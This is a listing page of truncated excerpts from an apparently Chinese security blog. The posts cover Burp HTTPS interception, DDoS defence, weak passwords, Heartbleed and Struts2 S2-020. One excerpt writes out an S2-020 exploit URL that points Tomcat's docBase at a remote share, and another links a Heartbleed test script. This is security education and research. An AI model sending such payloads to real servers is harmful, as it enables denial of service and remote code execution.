科普专线

安全科普:Installing Burp’s CA Certificate

发表于3年前 | 作者: seay

0
  burp suite代理https的时候,会使用服务器传过来的CA证书与服务器进行数据交互,而burp会把自己的证书数据传送给客户端(浏览器),而客户端(浏览器)需要信任burp的证书,这样进行交互burp才能捕获到明文数据,如果你用burp做代理分析移动设备上的app https数据包的时候记得需要先安装burp的证书。 下面是详细的介绍: By default, when you browse an HTTPS website via Burp, th......

移动安全

0
  qcon(全球软件开发者大会)2014北京场举行时间从4月25号到27号,由infoq主办, 第一次在qcon这么大的国际会议上进行技术分享,在大会开始之前qcon还组织了免费的讲师训练营,非常感谢infoq这样的良心主办方。   近期qcon会提供本场的ppt下载和大会完整视频,到时候大家可以由视频来感受一下。我的ppt《移动APP背后的安全问题》提前分享一下:   下载地址: http://p......

渗透测试

0
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!  暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat利用方式: http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test 绕过方式是: http://localhost:8080/Str......

科普专线

0
1. 防御基础   1.1. 攻击流量到底多大 谈到DDoS防御,首先就是要知道到底遭受了多大的攻击。这个问题看似简单,实际上却有很多不为人知的细节在里面。   以SYN Flood为例,为了提高发送效率在服务端产生更多的SYN等待队列,攻击程序在填充包头时,IP首部和TCP首部都不填充可选的字段,因此IP首部长度恰好是20字节,TCP首部也是20字节,共40字节。   对于以太网来说,最小的包长度数据段......

科普专线

0
1.   DDoS攻击基础 DDoS(Distributed Denial of Service,分布式拒绝服务)攻击的主要目的是让指定目标无法提供正常服务,甚至从互联网上消失,是目前最强大、最难防御的攻击之一。   按照发起的方式,DDoS可以简单分为三类。   第一类以力取胜,海量数据包从互联网的各个角落蜂拥而来,堵塞IDC入口,让各种强大的硬件防御系统、快速高效的应急流程无用武之地。这种类型的攻击典......

科普专线

0
去年在《凌云》杂志上写过一篇关于DDoS攻防的文章,在线版本可以到官方网站http://storage.aliyun.com/aliyun_portal_storage/lingyun/lingyun-journal-2.pdf查看。当时因为篇幅的原因有些细节没有展开,加上时间过去了大半年,出现了许多新的流行的攻击方式,所以决定写一篇补遗。 一、DRDoS攻击 DRDoS(分布式反射攻击)最早在2004年左右就出现了,安全焦点上还有一份国外的代码,可以在http:......

安全运营 科普专线

安全运营:弱口令,企业安全的坟墓

发表于3年前 | 作者: seay

4
   从今年起一直在关注企业安全,包括一些运维安全、开发安全以及企业安全运营,这会是我以后的方向。我一直回避“黑客”这个词,也从来不把这两个字说到自己身上,虽然现在的工作很大一部分是授权入侵各种大小企业,尝试拿到最敏感的数据,我入侵过无数大大小小的企业内网,甚至一些巨型上市企业,可以把渗透做的非常细。但是我对自己的评价一直都是安全工程师。在安全领域,无非就是攻和防,......

渗透测试

0
测试脚本: http://pan.baidu.com/s/1hq41y9A  OpenSSL官方网站4月7日发布公告,有研究人员发现OpenSSL 1.0.1和1.0.2-beta版本中存在安全漏洞(编号为CVE-2014-0160),可能暴露密钥和私密通信,应该尽快修补,方法是: 升级到最新版本OpenSSL 1.0.1g 无法立即升级的用户可以以-DOPENSSL_NO_HEARTBEATS开关重新编译OpenSSL 1.0.2-beta版本的漏洞将在beta2版本修复 ......

渗透测试

0
Struts S2-020这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成DOS、文件下载等危害,相信各大厂商也已经采取了相应的安全措施。今天是和大家分享一下对这个漏洞的一点研究,包括如何在Tomcat 8下导致RCE,目的是抛砖引玉,有不足之处欢迎大家指出。 1.属性列举 这个漏洞分析的一个难点在于:通过ognl的class.xx这种方式来遍历属性时,得到的是实际运行环境中的动态class,因此仅......

人文创业

0
  参加了今年qcon北京区的技术分享大会,qcon给了分享嘉宾非常赞的一个福利:演讲培训。今天去参加完培训收获非常大,培训导师是Gary(杨天颖),专业商务演讲教练,培训过苹果、三星、索尼等等公司高管,一整天的培训过程中注意力都被他吸引住,我记了将近两页的关键词,大概内容跟下面这篇文章差不多,文章来源于http://jiaren.org/2013/05/06/ppt-18-tips/ 如何成为一个演讲高手呢?在......